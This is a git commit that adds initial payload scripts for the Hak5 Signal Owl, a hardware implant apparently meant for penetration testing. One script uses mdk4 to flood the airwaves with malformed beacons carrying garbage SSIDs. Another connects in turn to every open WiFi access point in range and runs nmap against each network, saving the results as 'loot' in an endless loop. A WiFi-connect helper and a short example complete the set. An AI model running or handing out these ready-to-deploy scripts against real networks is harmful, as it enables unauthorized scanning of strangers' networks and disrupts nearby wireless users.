Add Initial Payloads (#1)

Add Initial Payloads.
pull/3/head
Marc 2019-08-07 17:12:10 +00:00 committed by GitHub
parent 7b24644d1b
commit 1e5bafda4d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
5 changed files with 152 additions and 1 deletions

View File

@ -1 +1,8 @@
# Hak5 Owl Payloads Repository
# Payload Library for the Signal Owl by Hak5
![Signal Owl](https://cdn.shopify.com/s/files/1/0068/2142/files/signal-owl_400x.jpg "Signal Owl")
* [Purchase](https://shop.hak5.org/products/signal-owl "Purchase at Hak5.org")
* [Forums](https://forums.hak5.org/forum/98-signal-owl/ "Signal Owl Forums")
* [Documentation](https://docs.hak5.org/hc/en-us/categories/360002117953-Signal-Owl "Signal Owl Documentation")
* [Downloads](https://downloads.hak5.org/ "Signal Owl Downloads")

View File

@ -0,0 +1,15 @@
#!/bin/bash
#
# Title: WIFI_CONNECT
# Description: Simplifies WiFi client mode connection. Expects $WIFI_SSID and $WIFI_PASS
# Author: Hak5Darren
function WIFI_CONNECT() {
logger running extension: wifi_connect
ifconfig wlan0 up;sleep 2
echo -e "network={\nssid=\"$WIFI_SSID\"\npsk=\"$WIFI_PASS\"\npriority=1\n}">/tmp/wpa.conf
wpa_supplicant -B -Dnl80211 -i wlan0 -c /tmp/wpa.conf
while(iwconfig wlan0 | grep Not-Associated); do sleep 1; done
udhcpc -i wlan0
}
export -f WIFI_CONNECT

View File

@ -0,0 +1,10 @@
# Title: Garbage SSID Spammer
# Description: Uses mdk4 to beacon non-printable SSIDs and SSIDs that break the 32-byte limit
# Author: Hak5Darren
# Props: ASPj and the aircrack-ng community
# Version: 1.0
LED SETUP
airmon-ng start wlan0
LED ATTACK
mdk4 wlan0mon b -a -m -s 500

View File

@ -0,0 +1,106 @@
#!/bin/bash
#
# Title: Open AP Nmap Scanner
# Author: Hak5Darren
# Version: 1.0
#
# Description: Scans for open access points, then connects to each and runs an Nmap scan saving logs to the loot folder
#
# LED SETUP: Scanning
# LED ATTACK: Connected, running nmap scan
#
# See nmap --help for options. Default "-sP" ping scans the address space for fast host discovery.
NMAP_OPTIONS="-sP"
LOOT_DIR=/root/loot/open_ap_nmap_scan
MAX_CIDR=20
DEBUG=1
function scan_wifi() {
[[ $DEBUG == 1 ]] && echo Scanning for open access points | tee -a /tmp/payload.log
iwlist wlan0 scan > /tmp/wifi_scan
cat /tmp/wifi_scan | grep "Encryption key:off" -A1 | grep ESSID | sort | uniq | cut -c 28- | sed "s/.$//g" > /tmp/open
total_aps=$(cat /tmp/open | wc -l)
[[ $DEBUG == 1 ]] && echo Found "$total_aps" open access points | tee -a /tmp/payload.log
}
function check_ap() {
current_ap=$(sed -n "$on"p /tmp/open)
[[ $DEBUG == 1 ]] && echo "-------------------------------" | tee -a /tmp/payload.log
current_ap_mac=$(cat /tmp/wifi_scan | grep "$current_ap" -B5 | grep Address | awk {'print $5'} | head -1)
[[ $DEBUG == 1 ]] && echo Selected AP MAC: "$current_ap_mac" | tee -a /tmp/payload.log
if grep -i -q "$current_ap_mac" /tmp/nmap_scanned; then
[[ $DEBUG == 1 ]] && echo Skipping - Already scanned AP: "$current_ap" with MAC: "$current_ap_mac" | tee -a /tmp/payload.log
else
connect_wifi
scan_network
fi
}
function connect_wifi() {
LED STAGE1
[[ $DEBUG == 1 ]] && echo Connecting to Open WiFi AP: "$current_ap" | tee -a /tmp/payload.log
ifconfig wlan0 down
iwconfig wlan0 mode Managed essid "$current_ap"
ifconfig wlan0 up
while(iwconfig wlan0 | grep Not-Associated); do sleep 1; done
[[ $DEBUG == 1 ]] && echo "Connected to AP number $on with SSID $current_ap" | tee -a /tmp/payload.log
udhcpc -i wlan0
while [ -z "$SUBNET" ]; do
sleep 1 && find_subnet
done
APMAC=$(iw wlan0 link | grep Connected | awk {print'$3'})
[[ $DEBUG == 1 ]] && echo "AP MAC Address/BSSID: $APMAC" | tee -a /tmp/payload.log
[[ $DEBUG == 1 ]] && iwconfig wlan0 | grep ESSID | tee -a /tmp/payload.log
[[ $DEBUG == 1 ]] && ifconfig wlan0 | grep inet | tee -a /tmp/payload.log
}
function scan_network() {
LED STAGE2
find_subnet
[[ $DEBUG == 1 ]] && echo "Found Subnet: $SUBNET" | tee -a /tmp/payload.log
CIDR=$(echo $SUBNET | cut -d '/' -f 2)
[[ $DEBUG == 1 ]] && echo "CIDR: $CIDR" | tee -a /tmp/payload.log
if [ "$CIDR" -ge "$MAX_CIDR" ]
then
[[ $DEBUG == 1 ]] && echo "Starting network scan" | tee -a /tmp/payload.log
nmap $NMAP_OPTIONS $SUBNET -oN "$LOOT_DIR/$current_ap-$APMAC.txt" &>/dev/null
else
[[ $DEBUG == 1 ]] && echo "Network too large - skipping scan" | tee -a /tmp/payload.log
fi
echo $APMAC >> /tmp/nmap_scanned
}
function find_subnet() {
SUBNET=$(ip addr | grep -i wlan0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//')
[[ $DEBUG == 1 ]] && echo "Found subet for network $current_ap as $SUBNET" | tee -a /tmp/payload.log
}
function run() {
while true; do
setup
scan_wifi
while [ "$on" -le "$total_aps" ]
do
if [ "$on" -ge 1 ]; then check_ap; fi
let on=on+1
done
sleep 5
[[ $DEBUG == 1 ]] && echo Completed recon. Restarting... | tee -a /tmp/payload.log
done
}
function setup() {
LED SETUP
mkdir -p $LOOT_DIR
touch /tmp/nmap_scanned
on=0
killall wpa_supplicant
}
# Run payload
run

View File

@ -0,0 +1,13 @@
# Title: Simple WiFi Connection Example
# Author: Hak5Darren
# Version: 1.0
# WiFi Client Setup
WIFI_SSID="network-name"
WIFI_PASS="passphrase"
LED SETUP
WIFI_CONNECT
# optionally start SSH server
# /etc/init.d/sshd start
LED ATTACK